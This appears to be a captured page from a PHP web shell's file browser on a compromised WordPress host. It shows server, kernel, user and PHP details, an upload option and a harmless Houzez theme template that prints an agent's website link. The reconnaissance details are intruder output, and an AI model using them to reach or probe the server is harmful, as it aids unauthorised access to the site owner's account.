HEX
Server: Apache
System: Linux pdx1-shared-a2-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_hwg2wc (6369923)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/dh_hwg2wc/fnaluxury.com/wp-content/themes/houzez/template-parts/realtors/agent/website.php
<?php 
$agent_website = get_post_meta( get_the_ID(), 'fave_agent_website', true );

if(is_author()) {
	global $author_website;
	$agent_website = $author_website;
}

if( !empty( $agent_website ) ) { ?>
	<li>
		<strong><?php esc_html_e('Website', 'houzez'); ?></strong> 
		<a target="_blank" href="<?php echo esc_url($agent_website); ?>"><?php echo esc_attr( $agent_website ); ?></a>
	</li>
<?php } ?>